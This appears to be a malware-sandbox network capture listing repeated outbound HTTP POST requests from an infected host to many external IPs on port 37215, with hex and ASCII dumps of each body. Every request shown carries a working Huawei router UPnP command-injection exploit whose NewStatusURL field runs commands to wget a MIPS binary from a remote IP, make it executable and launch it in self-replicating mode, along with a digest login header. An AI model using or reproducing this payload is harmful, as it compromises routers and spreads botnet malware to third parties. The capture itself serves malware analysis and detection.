                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2856192.168.2.2341896157.171.170.237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651355982 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2857192.168.2.234155441.88.192.16237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651365042 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2858192.168.2.2355478157.86.83.18437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651401997 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2859192.168.2.236043841.114.70.15437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651410103 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2860192.168.2.2353288157.239.92.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651413918 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2861192.168.2.2341506157.43.252.23337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651437998 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2862192.168.2.2359432157.248.69.3737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651444912 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2863192.168.2.2338818157.65.113.11637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651447058 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2864192.168.2.2354402197.182.119.15237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651453972 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2865192.168.2.236007041.237.14.5337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:15.651465893 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
